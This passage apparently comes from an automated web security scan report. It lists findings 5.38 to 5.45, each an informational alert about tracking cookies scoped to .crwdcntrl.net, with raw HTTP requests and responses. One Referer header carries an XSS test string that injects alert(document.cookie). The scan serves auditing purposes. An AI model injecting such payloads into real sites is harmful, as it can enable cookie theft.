Set-Cookie: aud=ABR4nGNgYGDwXRDsysDAqG%2Fl6vaeQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAPGAPW0%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:29 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2PX%2F95ijDAyM%2Blaubu9BYgwczrJKLAwMZxkY%2FgPF3wApRgYGydsrQdSX24eBFDMDA99PBr5fDDzKAg5MQKX%2Fv4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQUrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQAz6rab; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:29 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.38. http://bcp.crwdcntrl.net/4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDkzMDAqG%2FlGH6aQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAMoBPVM%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyPn%2F99jjDAyM%2BlaO4adBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2FtPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBrALb1

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:20 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDkw8DAqG%2FlWMPHoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPADupPMQ%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:20 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOf%2F99h9DAyM%2BlaONXwgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAihmo6CcD3y8GHmUBByag0v%2B%2FwUqBFCMDUBWj0FZLuB6mnwzMvxiYhTZtQhZi%2BcXApJQ0E24kRBWTUrwXWGglXIhRaNMOZI2MYFUucFUgPgOXTJ06ficH8O7DryBwETN%2BBVytkwgoqG%2FAr4Dz8XL8CrgTdhFSsBO%2FAr6Kt%2FgVyJpdxK8AADqztl4%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:20 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.39. http://bcp.crwdcntrl.net/4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBkz8DAqG%2Fl6B7KoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPAEBwPMk%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyP7%2F99jTDAyM%2BlaO7qEgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAipmBgeUnA98vBh5lAQcmoNL%2Fv8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoJVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAABXLrZs

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:10 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDkxMDAqG%2FlGHyWQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAMa5PVA%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:10 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOn%2F99gTDAyM%2BlaOwWdBYgwczrJKLAwMQM5%2FoPgbIMXIwCB5ey2I%2BnL7OJBiZmBg%2FcnA94uBR1nAgQmo9P9vsFIgxcgAVMUotNUSrofpJwPzLwZmoU2bkIVYfjEwKSXNhBsJUcWkFO8FFloJF2IU2rQDWSMjWJULXBWIz8AlU6eO38kBvPvwKwhcxIxfAVfrJAIK6hvwK%2BB8vBy%2FAu6EXYQU7MSvgK%2FiLX4FsmYX8SsAAGM%2BtvE%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:10 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.40. http://bcp.crwdcntrl.net/4/c=492%7Crand=622721104%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=622721104%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=622721104%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDkxMDAqG%2FlGHyWQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAMa5PVA%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOn%2F99gTDAyM%2BlaOwWdBYgwczrJKLAwMQM5%2FoPgbIMXIwCB5ey2I%2BnL7OJBiZmBg%2FcnA94uBR1nAgQmo9P9vsFIgxcgAVMUotNUSrofpJwPzLwZmoU2bkIVYfjEwKSXNhBsJUcWkFO8FFloJF2IU2rQDWSMjWJULXBWIz8AlU6eO38kBvPvwKwhcxIxfAVfrJAIK6hvwK%2BB8vBy%2FAu6EXYQU7MSvgK%2FiLX4FsmYX8SsAAGM%2BtvE%3D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:10 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDkxMDAqG%2FlGKrFoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPACSOPK8%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:10 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOn%2F99gTDAyM%2BlaOoVogMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAipmBge0nA98vBh5lAQcmoNL%2Fv8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoJVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAAghrZR; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:10 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.41. http://bcp.crwdcntrl.net/4/c=492%7Crand=624837915%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=624837915%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=624837915%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRC0loGBUd%2FK6dspBnUGBgGlBoYGoHgvmOK5DKZEt4Epwa9gipcZIncTIrcfIigN4S2EUIsgSvggvCwGEOB6DOGlQ6hECJUApvj%2Fgik2XjDFYQSmhM3AFNcMsHY%2BUYgGYTAlcg6ipBpMCRyHmOIGpoSeQZwbAeEVQ%2FQdgvBKIC57D9GuD3H8PwhlCtF3AOJcfyAPAOu1Plw%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaO3%2F77GxDAyM%2BlZO306BxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBu6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgCYn7d6

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:38:16 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBswcDAqG%2FlKsrBoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPALT0PEg%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:16 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2OL%2F95hLDAyM%2BlauohwgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O2VIOrL7cNAipmBgecnA98vBh5lAQcmoNL%2F38FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoKVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAD7RrWB; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:16 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.42. http://bcp.crwdcntrl.net/4/c=492%7Crand=708673296%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=708673296%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=708673296%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=408799&1ae67'-alert(document.cookie)-'3ecbfdbef18=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDsysDAqG%2Fl6vaeQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAPGAPW0%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2PX%2F95ijDAyM%2Blaubu9BYgwczrJKLAwMZxkY%2FgPF3wApRgYGydsrQdSX24eBFDMDA99PBr5fDDzKAg5MQKX%2Fv4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQUrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQAz6rab

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:39:45 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRA8kYGBUd%2FKraCbQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAP0hPYA%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:39:45 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgeOL%2F7zGVDAyM%2BlZuBd0gMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0VIOrL7UNAipmBgf8nA98vBh5lAQcmoNL%2F38BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoCVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAACnk7ZF; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:39:45 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.43. http://bcp.crwdcntrl.net/4/c=492%7Crand=759762185%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=759762185%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=759762185%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwnX7lEQMDo76k%2BGR5BlUGBgElBimgMEMvmBLdBqZ4LoMpwa9gipcZIngTomQ%2FRFAawlsIoRZBlPCBKa7HYEpMBCKXDqESIVQCmOL%2FC6bYeMEUhxGYEjYDuYSBTxSiUhhMiZwDUwLHIUqqwUqEnkFMcYO4MwJMCRVD9B2C8EogTnoP1sD7D6JdH8IzhbjTH0gBABTHG0A%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Dv9yqP%2F%2F29rMDAw6kuKT5YHiTGwO8sqMTEwSP5%2F9p%2BRgeELAwOQAvJ5%2FjPwKSXNRBZi%2Bs%2FALLTVkhGmGCjEDBLatAlZCKiKRWjTDjQhRqV4F5BZ%2Fx8BhYAMJqV4LzgfqIQRaBADl0ydOrpTAnj3oQsFLmJGF%2BJqnYQhVN%2BALsSdsAtdiPPxckxVO9GF%2BCreogvJml1EFwIA1uVxiQ%3D%3D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:29:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRCoy8DAqG9lK8XCoM7AIKCk4scGFO8FUzyXwZToNjAl%2BBVM8TJD5G5C5PZDBKUhvIUQahFECR%2BEl8UAAlyPIbx0CJUIoRLAFP9fMMXGC6Y4jMCUsJmKCZDimgHWzicK0SAMpkTOQZRUg5UIHIeY4gamhJ5BnBsB4RVD9B2C8EogLnsP1iesD6Z4%2F0H8YArRdwDiXH8gDwAzsiis; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:29:33 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgUPf%2F97i7DAyM%2Bla2UiwgMQYOZ1klIOssA8N%2FoPgbIMXIwCB5exOI%2BnL7DJBiBor%2FZOD7xcCjLODAhKYUqIpRaKslXA%2FTTwbmXwzMQps2IQux%2FGJgUkqaCTcSoopJKd4LLLQOLsQotGkHskZGsCoXuCoQn4FLpk4dv5MDePfhVxC4iBm%2FAq7WSQQU1DfgV8D5eDl%2BBdwJuwgp2IlfAV%2FFW%2FwKZM0u4lcAAMEusn8%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:29:33 GMT; Path=/
Set-Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; Domain=.crwdcntrl.net; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 326

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><iframe src='http://bcp.crwdcntrl.ne
...[SNIP]...
5.44. http://bcp.crwdcntrl.net/4/c=492%7Crand=769353744%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=769353744%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=769353744%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDkxMDAqG%2FlGKrFoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPACSOPK8%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOn%2F99gTDAyM%2BlaOoVogMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAipmBge0nA98vBh5lAQcmoNL%2Fv8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoJVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAAghrZR

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:11 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDkzMDAqG%2FlGH6aQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAMoBPVM%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:11 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyPn%2F99jjDAyM%2BlaO4adBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2FtPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBrALb1; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:11 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.45. http://bcp.crwdcntrl.net/4/c=492%7Crand=770680268%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=770680268%7Cpv=y%7Crt=ifr

Issue detail

